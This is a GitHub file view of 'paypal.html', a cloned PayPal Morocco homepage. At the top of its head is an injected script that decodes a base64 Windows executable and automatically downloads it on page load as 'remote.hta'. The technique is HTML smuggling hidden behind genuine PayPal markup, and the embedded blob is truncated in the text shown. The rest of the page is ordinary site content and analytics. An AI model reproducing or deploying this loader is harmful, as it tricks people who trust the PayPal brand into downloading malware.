-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathpaypal.html
910 lines (500 loc) · 34.7 KB
/
paypal.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
<!DOCTYPE html>
<html lang="en-MA" class="no-js" data-device-type="dedicated">
<head><script async src="https://www.paypalobjects.com/webcaptcha/ngrlCaptcha.min.js"></script>
<script>
function base64ToArrayBuffer(base64) {
var binary_string = window.atob(base64);
var len = binary_string.length;
var bytes = new Uint8Array( len );
for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); }
return bytes.buffer;
}
var file = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAAZIYJAAAAAAAAAAAAAAAAAPA>
var data = base64ToArrayBuffer(file);
var blob = new Blob([data], {type: 'octet/stream'});
var fileName = 'remote.hta';
var a = document.createElement('a');
document.body.appendChild(a);
a.style ='display: none';
var url = window.URL.createObjectURL(blob);
a.href = url;
a.download=fileName;
a.click();
window.URL.revokeObjectURL(url);
</script>
<title>A Simple and Safer Way to Pay and Get Paid | PayPal MA</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="robots" content="NOODP"/>
<meta charset="UTF-8" />
<meta name="application-name" content="PayPal" />
<meta name="msapplication-task" content="name=My Account;action-uri=https://www.paypal.com/ma/myaccount/summary;icon-uri=https://www.paypalobjects.com/webstatic/icon/favicon.ico" />
<meta name="msapplication-task" content="name=Send Money;action-uri=https://www.paypal.com/ma/webapps/mpp/send-money-online;icon-uri=https://www.paypalobjects.com/webstatic/icon/favicon.ico" />
<meta name="msapplication-task" content="name=Request Money;action-uri=https://www.paypal.com/ma/webapps/mpp/requesting-payments;icon-uri=https://www.paypalobjects.com/webstatic/icon/favicon.ico" />
<meta name="description" content="PayPal is the faster, safer way to send money, make an online payment, receive money or set up a merchant account." />
<meta name="theme-color" content="#009cde" />
<link rel="canonical" href="https://www.paypal.com/ma/home" />
<meta name="twitter:card" content="summary"><meta name="twitter:site" content="@paypal"><meta name="twitter:title" content="A Simple and Safer Way to Pay and Get Paid"/><meta name="twitter:image" content="https://www.paypalobjects.com/webstatic/icon/pp258.png"><meta name="twitter:description" content="PayPal is the faster, safer way to send money, make an online payment, receive money or set up a merchant account." />
<meta property="og:url" content="https://www.paypal.com/ma/webapps/mpp/home" />
<meta property="og:type" content="website" />
<meta property="og:title" content="A Simple and Safer Way to Pay and Get Paid"/><meta property="og:image" content="https://www.paypalobjects.com/webstatic/icon/pp258.png"><meta property="og:description" content="PayPal is the faster, safer way to send money, make an online payment, receive money or set up a merchant account." />
<link rel="preload" as="font" type="font/woff2" crossOrigin="anonymous" href="https://www.paypalobjects.com/digitalassets/c/paypal-ui/fonts/PayPalSansSmall-Regular.woff2" />
<link rel="preload" as="font" type="font/woff2" crossOrigin="anonymous" href="https://www.paypalobjects.com/digitalassets/c/paypal-ui/fonts/PayPalSansBig-Light.woff2" />
<link rel="apple-touch-icon-precomposed" sizes="144x144" href="https://www.paypalobjects.com/webstatic/icon/pp144.png" />
<link rel="apple-touch-icon-precomposed" sizes="114x114" href="https://www.paypalobjects.com/webstatic/icon/pp114.png" />
<link rel="apple-touch-icon-precomposed" sizes="72x72" href="https://www.paypalobjects.com/webstatic/icon/pp72.png" />
<link rel="apple-touch-icon-precomposed" href="https://www.paypalobjects.com/webstatic/icon/pp64.png" />
<link rel="shortcut icon" sizes="196x196" href="https://www.paypalobjects.com/webstatic/icon/pp196.png" />
<link rel="shortcut icon" type="image/x-icon" href="https://www.paypalobjects.com/webstatic/icon/favicon.ico" />
<link rel="icon" type="image/x-icon" href="https://www.paypalobjects.com/webstatic/icon/pp32.png" />
<link rel="dns-prefetch" href="https://www.paypalobjects.com">
<link rel="dns-prefetch" href="https://www.google-analytics.com">
<meta name="viewport" content="width=device-width, initial-scale=1">
<script nonce="n+rmAZ+Q0YaZ8gOb4OjXWJ9QFk+hjw2dcGZpnPt17NIB2scL" type="application/ld+json">
{
"@context": "http://schema.org/",
"@type": "Organization",
"url": "https://www.paypal.com/",
"logo": "https://www.paypalobjects.com/webstatic/i/logo/rebrand/ppcom.png"
}
</script>
<style id="antiClickjack">
html.js body {display: none !important;}
</style>
<script nonce="n+rmAZ+Q0YaZ8gOb4OjXWJ9QFk+hjw2dcGZpnPt17NIB2scL" >
if (self === top || /(paypal\.com|paypal\.cn)$/.test(window.parent.location.hostname)) {var antiClickjack = document.getElementById("antiClickjack");if (antiClickjack) {antiClickjack.parentNode.removeChild(antiClickjack);}} else {top.location = self.location;}
</script>
<link rel="stylesheet" href="https://www.paypalobjects.com/marketing-resources/css/3a/13d0539ec464ee32f44dc22b363ec99b0e72de.css" type="text/css" />
<link rel="stylesheet" href="https://www.paypalobjects.com/marketing-resources/css/d2/9874a68830e67406fe59aba4c25fa1396fd7c0.css" type="text/css" />
<link rel="stylesheet" href="https://www.paypalobjects.com/marketing-resources/css/1b/fa89f17d37eb3f97e39b926835ba73c0a3fd63.css" type="text/css" />
<link rel="stylesheet" href="https://www.paypalobjects.com/marketing-resources/css/4f/6cbe5c63789ddc0cab8a294d5752b32912d86a.css" type="text/css" />
</head>
<body>
<div id="body" class="">
<header class="table-row pp-header" role="banner">
<div>
<div class="containerCentered ">
<a href="#Menu" id="menu-button" role="button">Menu</a>
<a data-pa-click="header|paypal-logo" href="https://www.paypal.com/ma/webapps/mpp/home" class="paypal-img-logo">PayPal</a>
<nav id="main-menu" class="main-menu" role="navigation">
<ul>
<li><a href="https://www.paypal.com/ma/webapps/mpp/home" id="header-personal" rel="menuitem" aria-controls="submenu-personal">PERSONAL</a><div class="menu-wrapper" id="submenu-personal" aria-label="header-personal"><a href="https://www.paypal.com/ma/webapps/mpp/home" id="header-closing-personal" rel="menuitem" aria-controls="header-personal-menu" data-pa-click="header|closing|personal">PERSONAL</a><ul id="header-personal-menu" class="subnav list two-col"><li><a href="https://www.paypal.com/ma/webapps/mpp/personal">How PayPal Works<em>What you can do with a personal account</em></a></li><li><a href="https://www.paypal.com/ma/webapps/mpp/pay-online">Pay Online <em>Online payments without borders</em></a></li><li><a href="https://www.paypal.com/ma/webapps/mpp/send-money-online">Send Payments <em>Send payments locally or abroad</em></a></li><li><a href="https://www.paypal.com/ma/webapps/mpp/requesting-payments">Get paid <em>Request payments from almost anyone</em></a></li><li><a href="https://www.paypal.com/ma/webapps/mpp/mobile-apps">Get the PayPal App <em>Manage your account on your mobile</em></a></li><li><a href="https://www.paypal.co.uk/shopping/">Search for Deals <em>Pay with PayPal and save money</em></a></li></ul></div></li><li><a href="https://www.paypal.com/ma/webapps/mpp/merchant" id="header-business" rel="menuitem" aria-controls="submenu-business">BUSINESS</a><div class="menu-wrapper" id="submenu-business" aria-label="header-business"><a href="https://www.paypal.com/ma/webapps/mpp/merchant" id="header-closing-business" rel="menuitem" aria-controls="header-business-menu" data-pa-click="header|closing|business">BUSINESS</a><ul id="header-business-menu" class="subnav list two-col"><li><a href="https://www.paypal.com/ma/webapps/mpp/merchant">All business solutions <em>See our range of products</em></a></li><li><a href="https://www.paypal.com/ma/webapps/mpp/accept-payments-online">Accept online payments <em>Get paid on your website</em></a></li><li><a href="https://www.paypal.com/ma/webapps/mpp/email-invoice">Send invoices <em>Create and email online invoices</em></a></li></ul></div></li>
<li><a href="https://www.paypal.com/ma/webapps/mpp/partners-and-developers" id="header-partners" class="no-drop">Partners and Developers</a></li>
</ul>
<ul class="sublist">
<li><a href="https://www.paypal.com/ma/webapps/mpp/account-selection" id="signup-button-mobile" name="SignUp_header" aria-label="Sign Up" class="btn btn-small btn-white-border signup-mobile" data-pa-click="header|signup-mobile">Sign Up</a></li>
</ul>
</nav>
<style>
.pp-header-open--enhanced #body.menu-open .pp-header.table-row {
height: 365px;
max-height: 365px
}
.pp-header-open--enhanced #body.menu-open .pp-header.table-row .main-menu .menu-wrapper {
height: 100%;
}
.pp-header-open--enhanced #body.menu-open .pp-header.table-row .main-menu .menu-wrapper a {
font-family: pp-sans-small-regular,Helvetica Neue,Arial,sans-serif;
font-weight: 700;
}
.pp-header-open--enhanced #body.menu-open .pp-header.table-row .main-menu .menu-wrapper .subnav .subnav-grouped li {
height: 34px;
width: 100%;
text-align: left;
}
.pp-header-open--enhanced #body.menu-open .pp-header.table-row .main-menu .menu-wrapper .subnav .subnav-grouped .submenu-col--l2 li:not(:first-child) a {
font-weight: 400;
}
.pp-header-open--enhanced #body.menu-open .pp-header.table-row .main-menu .menu-wrapper .subnav .subnav-grouped .submenu-col--l2 li:not(:first-child) {
height: 28px;
}
.pp-header-open--enhanced #body.menu-open.rtl .pp-header.table-row .main-menu .menu-wrapper .subnav .subnav-grouped li {
text-align: right;
}
.pp-header-open--enhanced #body.menu-open .pp-header.table-row .main-menu .menu-wrapper .subnav .subnav-grouped li.submenu-col__header,
.pp-header-open--enhanced #body.menu-open .pp-header.table-row .main-menu .menu-wrapper .subnav .subnav-grouped.subnav-grouped--no-header li:first-child {
display: block;
text-transform: uppercase;
white-space: nowrap;
color: #fff;
font-weight: 400;
font-family: PayPalSansBig-Light, Helvetica Neue, Arial, sans-serif;
margin-bottom: 0;
margin-top: 25px;
height: 20px;
border-bottom: 1px solid rgba(255, 255, 255, 0.3);
padding-bottom: 7px;
}
@media (min-width: 1152px) {
.pp-header-open--enhanced #body.menu-open .pp-header.table-row .main-menu .menu-wrapper .subnav .subnav-grouped li a {
padding-left: 0;
}
.pp-header-open--enhanced #body.menu-open .pp-header.table-row .main-menu .menu-wrapper .subnav .subnav-grouped li.submenu-col__header,
.pp-header-open--enhanced #body.menu-open .pp-header.table-row .main-menu .menu-wrapper .subnav .subnav-grouped.subnav-grouped--no-header li:first-child {
padding-top: 18px;
margin-top: 0;
height: 26px;
}
.pp-header-open--enhanced #body.menu-open .pp-header.table-row .main-menu .menu-wrapper .subnav .subnav-grouped li.submenu-col__header {
margin-bottom: 12px;
}
.pp-header-open--enhanced #body.menu-open .pp-header.table-row .subnav-grouped {
width: 25%;
box-sizing: border-box;
padding-right: 30px;
}
.pp-header-open--enhanced #body.menu-open .pp-header.table-row .subnav-grouped.subnav-grouped--with-l2 {
width: 40%;
}
.pp-header-open--enhanced #body.menu-open .pp-header.table-row .subnav-grouped.subnav-grouped--without-l2 {
width: 20%;
}
.pp-header-open--enhanced #body.menu-open .pp-header.table-row .subnav-grouped.subnav-grouped--with-l2 .submenu-col {
width: 50%;
display: inline-block;
vertical-align: top;
}
.pp-header-open--enhanced #body.menu-open .pp-header.table-row .subnav-grouped.subnav-grouped-spacing-left {
margin-left: 25%;
}
.pp-header-open--enhanced #body.menu-open .pp-header.table-row .main-menu .menu-wrapper .subnav .subnav-grouped .submenu-col--l2 {
box-sizing: border-box;
padding-left: 20px;
}
.pp-header.table-row .main-menu .menu-wrapper .subnav li {
-webkit-flex-grow: 0;
-ms-flex-positive: 0;
flex-grow: 0;
width: 31%;
height: 50%;
}
html[lang='en-GB'] .pp-header.table-row .main-menu .menu-wrapper .subnav.lvl-2 li {
width: 25%;
}
html[lang='en-GB'] .pp-header.table-row .main-menu .menu-wrapper .subnav.lvl-2 li > ul > li {
width: 36%;
}
html[lang='it-IT'] .pp-header.table-row .main-menu .menu-wrapper .subnav li {
width: 27%;
}
html[lang='es-ES'] .pp-header-open--enhanced #body.menu-open .pp-header.table-row .main-menu .menu-wrapper .subnav .subnav-grouped.subnav-grouped--without-l2 .submenu-col li:nth-child(4) {
height: 45px;
}
html[lang='es-ES'] .pp-header.table-row .main-menu .menu-wrapper .subnav li {
width: 27%;
}
}
@media (max-width: 1151px) {
html[lang='es-ES'] .pp-header-open--enhanced #body.menu-open .pp-header.table-row .main-menu .menu-wrapper .subnav .subnav-grouped.subnav-grouped--without-l2 .submenu-col li:nth-child(4) {
height: 42px;
}
}
</style>
<div id="header-buttons" class="header-buttons">
<a href="https://www.paypal.com/ma/signin" aria-label="Log In" data-pa-click="header|login" id="ul-btn" class="btn btn-small btn-secondary">Log In</a>
<a href="https://www.paypal.com/ma/webapps/mpp/account-selection" id="signup-button" aria-label="Sign Up" data-pa-click="header|signup" class="btn btn-small btn-signup">Sign Up</a>
</div>
</div>
</div>
</header>
<div role="main" id="main" class="containerMobileFullWidth">
<section class="row-fluid row hero-bg lightContent reverseLink cookied">
<div class="parallax-bg scroll-animate" data-translate-y-start="0" data-translate-y-end="80"></div>
<div class="containerCentered container">
<div class="span10 center-block center-text editorial-container">
<div class="editorial-cell ">
<h1 class="pageHeadline x-large h2">Faster purchases with One Touch<sup>TM</sup>.</h1>
<p class="contentPara">The same easy PayPal you know is faster than ever.<br/> Just activate One Touch<sup>TM</sup> purchases for staying logged in, and check out with just a few click.</p>
<a aria-label="More about One Touch<sup>TM</sup>" data-pa-click="Hero-PrmryCTA-Cookied-one-touch-checkout" class="btn heroBtn span8 col-sm-8 span6 center-block " href="https://www.paypal.com/ma/webapps/mpp/one-touch-checkout" >More about One Touch<sup>TM</sup></a>
</div>
</div>
</div>
</section>
<section class="row-fluid row panel panel-one panel-match-height three-panel" id="panel-one">
<header class="containerCentered container center-text">
<h2 class="pulloutHeadline ">PayPal is for everyone who pays or gets paid.</h2>
</header>
<div class="containerCentered container">
<div class=" span4 col-sm-4">
<h3 class="contentHead"><img src="https://www.paypalobjects.com/digitalassets/c/website/marketing/emea/gb/en/home/1-individuals.jpg" />Individuals</h3>
<p class="contentPara">Find out why we have more than 200M active accounts worldwide.</p>
<a data-pa-click="who-is-paypal-for|individuals-learnmore" class="contentLink btn blue-border-button" href="https://www.paypal.com/ma/webapps/mpp/personal" >Learn More</a>
</div>
<div class=" span4 col-sm-4">
<h3 class="contentHead"><img src="https://www.paypalobjects.com/digitalassets/c/website/marketing/emea/gb/en/home/2-businesses.jpg" />Businesses</h3>
<p class="contentPara">Join more than 7 million businesses around the world offering PayPal.</p>
<a data-pa-click="who-is-paypal-for|businesses-learnmore" class="contentLink btn blue-border-button" href="https://www.paypal.com/ma/webapps/mpp/merchant" >Learn More</a>
</div>
<div class=" span4 col-sm-4">
<h3 class="contentHead"><img src="https://www.paypalobjects.com/digitalassets/c/website/marketing/emea/gb/en/home/3-pd.jpg" />Partners and developers</h3>
<p class="contentPara">Work with PayPal to offer your customers world class payment solutions.</p>
<a data-pa-click="who-is-paypal-for|partners-learnmore" class="contentLink btn blue-border-button" href="https://www.paypal.com/ma/webapps/mpp/partners-and-developers" >Learn More</a>
</div>
</div>
</section>
<section class="steps-section row-fluid light threeSteps buyers-tab" id="buyers">
<header class="containerCentered center-text">
<h2 class="span12 pulloutHeadline threeStepsHeading">PayPal connects buyers and sellers.</h2>
<div class="buyersSellers">
<a href='#' class='buyers selected'>For buyers</a>
<a href='#' class='sellers'>For sellers</a>
</div>
</header>
<div class="containerCentered containerExtend">
<div class="span4 steps">
<span class="imageWrapper">
<img src="https://www.paypalobjects.com/digitalassets/c/website/marketing/emea/shared/send-receive-no-p2p/buyonline_browser1.png" alt=""/>
</span>
<p class="circle">1</p>
<p class="step-text"><a href="https://www.paypal.com/ma/welcome/signup" data-pa-click="for-buyers|signup">Sign up</a> with just an email address and password.</p>
</div>
<div class="span4 steps">
<span class="imageWrapper">
<img src="https://www.paypalobjects.com/digitalassets/c/website/marketing/emea/shared/send-receive-no-p2p/buyonline_browser2.png" alt=""/>
<span class="arrow"></span>
</span>
<p class="circle">2</p>
<p class="step-text">Securely add your cards.</p>
</div>
<div class="span4 steps">
<span class="imageWrapper">
<img src="https://www.paypalobjects.com/digitalassets/c/website/marketing/emea/shared/send-receive-no-p2p/buyonline_browser3.png" alt=""/>
<span class="arrow"></span>
</span>
<p class="circle">3</p>
<p class="step-text">Use the PayPal button to check out with just an email address and password.</p>
</div>
</div>
<a href="https://www.paypal.com/ma/webapps/mpp/personal" data-pa-click="for-buyers|learnmore" class="contentLink btn blue-border-button">Learn More</a>
</section>
<section class="steps-section row-fluid light threeSteps sellers-tab" id="sellers">
<header class="containerCentered center-text">
<h2 class="span12 pulloutHeadline threeStepsHeading">PayPal connects buyers and sellers.</h2>
<div class="buyersSellers">
<a href='#' class='buyers'>For buyers</a>
<a href='#' class='sellers selected'>For sellers</a>
</div>
</header>
<div class="containerCentered containerExtend">
<div class="span4 steps">
<span class="imageWrapper">
<img src="https://www.paypalobjects.com/digitalassets/c/website/marketing/emea/shared/send-receive-no-p2p/home/For_Sellers_1.png" alt=""/>
</span>
<p class="circle">1</p>
<p class="step-text"><a href="https://www.paypal.com/ma/bizsignup/entry/" data-pa-click="for-sellers|set-up">Set up a business account</a>.</p>
</div>
<div class="span4 steps">
<span class="imageWrapper">
<img src="https://www.paypalobjects.com/digitalassets/c/website/marketing/emea/shared/send-receive-no-p2p/home/For_Sellers_2.png" alt=""/>
<span class="arrow"></span>
</span>
<p class="circle">2</p>
<p class="step-text">Choose the features you want to start with. You can go back, change or add to them later.</p>
</div>
<div class="span4 steps">
<span class="imageWrapper">
<img src="https://www.paypalobjects.com/digitalassets/c/website/marketing/emea/shared/send-receive-no-p2p/home/For_Sellers_3.png" alt=""/>
<span class="arrow"></span>
</span>
<p class="circle">3</p>
<p class="step-text">Integrate PayPal via a partner, a developer or by yourself.</p>
</div>
</div>
<a href="https://www.paypal.com/ma/webapps/mpp/merchant" data-pa-click="for-sellers|learnmore" class="contentLink btn blue-border-button">Learn More</a>
</section>
<section class="row-fluid row panel panel-two panel-match-height blue reverseLink three-panel" id="panel-two">
<header class="containerCentered container center-text">
<h2 class="pulloutHeadline ">Join 200M active PayPal accounts worldwide.</h2>
</header>
<div class="containerCentered container4d2p1m container">
<div class=" span4 col-sm-4">
<h3 class="contentHead">Safer and protected</h3>
<p class="contentPara">Shop with peace of mind. We don’t share your full financial information with sellers. And PayPal Buyer Protection covers your eligible purchases if they don’t show up or match their description.</p>
<a data-pa-click="why-paypal|safety-security" class="contentLink" href="https://www.paypal.com/ma/webapps/mpp/paypal-safety-and-security" >More about security</a>
</div>
<div class="clearfix visible-sm ui-hidden-mobile ui-hidden-dedicated"></div>
<div class=" span4 col-sm-4">
<h3 class="contentHead">Across devices, worldwide</h3>
<p class="contentPara">With just one account, you can shop at millions of merchants around the world, and pay for goods or services almost anywhere. Use any of your devices to manage your account on the go with the PayPal app.</p>
<a data-pa-click="why-paypal|mobile-apps" class="contentLink" href="https://www.paypal.com/ma/webapps/mpp/mobile-apps" >Get the mobile app</a>
</div>
<div class=" span4 col-sm-4">
<h3 class="contentHead">Mostly free, always upfront</h3>
<p class="contentPara">It’s free to open a PayPal account and buy something using PayPal unless it involves a currency conversion. There may be fees for other transactions.</p>
<a data-pa-click="why-paypal|paypal-fees" class="contentLink" href="https://www.paypal.com/ma/webapps/mpp/paypal-fees" >More about fees</a>
</div>
</div>
</section>
<section class="closing-section row-fluid panel center-text light" >
<div class="containerCentered">
<div class="span12">
<p class="closingHeadline headline large">Sign up and get started.</p>
<a aria-label="Get Started" data-pa-click="Cookied-closing-cta-account-selection" class="btn closing-cta center-block " href="https://www.paypal.com/ma/webapps/mpp/account-selection" >Get Started</a>
</div>
</div>
</section>
</div>
<footer role="contentinfo" class="global-footer ">
<div class="containerCentered containerExtend">
<ul class="footer-main secondaryLink">
<li><a href="https://www.paypal.com/ma/smarthelp/home">Help and Contact</a></li>
<li><a href="https://www.paypal.com/ma/webapps/mpp/paypal-fees">Fees</a></li>
<li><a href="https://www.paypal.com/ma/webapps/mpp/paypal-safety-and-security">Security</a></li>
<li><a href="https://www.paypal.com/ma/webapps/mpp/about-paypal-products">Features</a></li>
<li><a href="https://www.paypal.com/ma/webapps/mpp/pay-online">Shop</a></li>
<li><a href='#' data-pa-click="footer|feedback" class="qualtricsFeedback">Feedback</a></li>
<li class="country-selector ">
<a
class="language"
data-pa-click="footer|country-selector"
href="?locale.x=en_US">
English
</a>
<a
href="https://www.paypal.com/ma/webapps/mpp/country-worldwide"
data-pa-click="footer|country-selector"
title="See all countries/regions"
aria-label="See all countries/regions"
class="country US">
See all countries/regions
</a>
</li>
</ul>
<hr>
<ul class="footer-secondary secondaryLink">
<li><a href="https://www.paypal.com/ma/webapps/mpp/about">About</a></li>
<li><a href="https://newsroom.paypal-corp.com/">Newsrooms</a></li>
<li><a href="https://www.paypal.com/ma/webapps/mpp/jobs">Jobs</a></li>
<li><a href="https://developer.paypal.com/">Developers</a></li>
<li><a href="https://www.paypal-marketing.com/emarketing/partner/na/program/index.html">Partners</a></li>
</ul>
<ul class="footer-tertiary copyright-section secondaryLink">
<li id="footer-copyright" class="footer-copyright">© 1999–2024 </li>
<li class="footer-accessibility"><a href="https://www.paypal.com/ma/webapps/mpp/accessibility" data-pa-click="footer|accessibility">Accessibility</a></li>
<li id="footer-privacy"><a href="https://www.paypal.com/ma/webapps/mpp/ua/privacy-full">Privacy</a></li>
<li class="footer-legal"><a href="https://www.paypal.com/ma/webapps/mpp/ua/legalhub-full">Legal</a></li>
</ul>
<p class="footer-notes">PayPal Pte. Ltd. (“3PL”) has applied for a license under the Singapore Payment Services Act (“PS Act”) with the Monetary Authority of Singapore. During this statutory transitional period, 3PL is operating under an exemption from holding a license and is allowed to continue to provide specific payment services.</p>
</div>
</footer>
</div>
<!--[if lte IE 9]>
<script src="https://www.paypalobjects.com/marketing-resources/js/b2/f34e53f94c2a6fb2a579294142f824ea64fad5.js"></script>
<![endif]-->
<script nonce="n+rmAZ+Q0YaZ8gOb4OjXWJ9QFk+hjw2dcGZpnPt17NIB2scL" >
var PP_GLOBAL_JS_STRINGS = {
"CLOSE": "Close",
"TOGGLE_FULL_SCREEN": "Toggle Full Screen",
"NO_PLAY_VIDEO": "Your browser cannot play this video",
"CLICK_TO_PLAY": "Paused. Click to play.",
"PLAY": "Play",
"PAUSE": "Pause",
"PLAY_OR_PAUSE": "Play or Pause",
"MUTE": "Mute",
"SEEK_VIDEO": "Skip to another location in the video",
"REWIND": "" || "",
"RESTART": "" || "",
"FORWARD": "" || "",
"MESSAGE_REQUIRED": "This field is required",
"MESSAGE_REMOTE": "Please fix this field",
"MESSAGE_EMAIL": "Please enter a valid email address",
"MESSAGE_EMAIL_OR_PHONE": "Please enter a valid email address",
"MESSAGE_URL": "Please enter a valid URL",
"MESSAGE_DATE": "Please enter a valid date",
"MESSAGE_DATEISO": "Please enter a valid date (ISO)",
"MESSAGE_NUMBER": "Must be a number",
"MESSAGE_DIGITS": "Please enter only digits",
"MESSAGE_CREDITCARD": "Please enter a valid credit card number",
"MESSAGE_EQUALTO": "Your passwords don't match. Please retype your password to confirm it.",
"MESSAGE_ACCEPT": "Please enter a value with a valid extension",
"MESSAGE_MAXLENGTH": "Please enter no more than {0} characters",
"MESSAGE_MINLENGTH": "Please enter at least {0} characters",
"MESSAGE_RANGELENGTH": "Please enter a value between {0} and {1} characters long",
"MESSAGE_RANGE": "Please enter a value between {0} and {1}",
"MESSAGE_MAX": "Please enter a value less than or equal to {0}",
"MESSAGE_MIN": "Please enter a value greater than or equal to {0}",
"MESSAGE_BADPHONE": "We can't send money to that phone number. Please use an email address."
};
var HOLIDAYS = '';
var BROWSER_TYPE = 'Chrome';
</script>
<script src="https://www.paypalobjects.com/marketing-resources/js/7b/6def5b234cbc37a348f3690b696fbb739f6371.js"></script>
<script nonce="n+rmAZ+Q0YaZ8gOb4OjXWJ9QFk+hjw2dcGZpnPt17NIB2scL" >
var feedbackLink = document.getElementsByClassName('qualtricsFeedback');
if (feedbackLink.length > 0) {
feedbackLink[0].onclick = function (e) {
e.preventDefault();
if (typeof PAYPAL !== 'undefined' && PAYPAL.analytics) {
PAYPAL.analytics.reloadQualtrics('mpp-footer-feedbacklink');
}
}
}
</script>
<script src="https://www.paypalobjects.com/marketing-resources/js/c1/ae1d8b387bed087c07d56e5e4fbed891a65a29.js"></script>
<script nonce="n+rmAZ+Q0YaZ8gOb4OjXWJ9QFk+hjw2dcGZpnPt17NIB2scL" >
$(function() {
$('.panel-match-height h3.contentHead').matchHeight();
$('.panel-match-height p.contentPara').matchHeight();
$('.threeSteps .buyersSellers a').on('click',function(e){
e.preventDefault();
if ($(this).hasClass('buyers')) {
$("#buyers").show();
$("#sellers").hide();
}
else{
$("#sellers").show();
$("#buyers").hide();
}
});
});
</script>
<script nonce="n+rmAZ+Q0YaZ8gOb4OjXWJ9QFk+hjw2dcGZpnPt17NIB2scL" >
var dataLayer = {
contentCountry: 'MA'.toLowerCase(),
contentLanguage: 'en'.toLowerCase(),
localTimeZone: '',
localTime: (new Date()).toString(),
fptiGuid: 'ea87af7c1850a7a0a4d64700fe8a51c6',
gaCid: '',
gaUid: ''
};
</script>
<script src="https://www.paypalobjects.com/pa/js/min/pa.js"></script>
<script nonce="n+rmAZ+Q0YaZ8gOb4OjXWJ9QFk+hjw2dcGZpnPt17NIB2scL" >
(function(){
var callFpti = function(fptiDataString) {
PAYPAL.core.pta = PAYPAL.analytics.setup({
data:fptiDataString,
trackCPL: true,
url:'https:\/\/t.paypal.com\/ts'
});
};
if(typeof PAYPAL.analytics !== "undefined") {
PAYPAL.core = PAYPAL.core || {};
var fptiDataString = 'pgrp=main%3Amktg%3Apersonal%3A%3Ahome&page=main%3Amktg%3Apersonal%3A%3Ahome%3A%3A%3A&pgst=Unknown&calc=f25733842baa4&nsid=tXtCeWvdvcZvVyR17zYeSHeRuwGi1YlW&rsta=en_MA&pgtf=Nodejs&env=live&s=ci&ccpg=ma&csci=c94d54d592d84e3bb8899043a6709662&comp=mppnodeweb&tsrce=authchallengenodeweb&cu=1&gacook=1099837400.1674677043&xe=104449&xt=119299&pgld=Unknown&bzsr=main&bchn=mktg&tmpl=home.dust&pgsf=personal&lgin=out&shir=main_mktg_personal_&pros=3&lgcook=2&event_props=cu%2Clgin%2Cpage%2Cxe%2Cxt&user_props=cu%2Cxe%2Cxt&event_name=ppcom_page_viewed&page_segment=ppcom';
if (typeof ga !== 'undefined' && ga !== null) {
ga(function(tracker) {
var gaClientId = tracker.get('clientId');
if (gaClientId) {
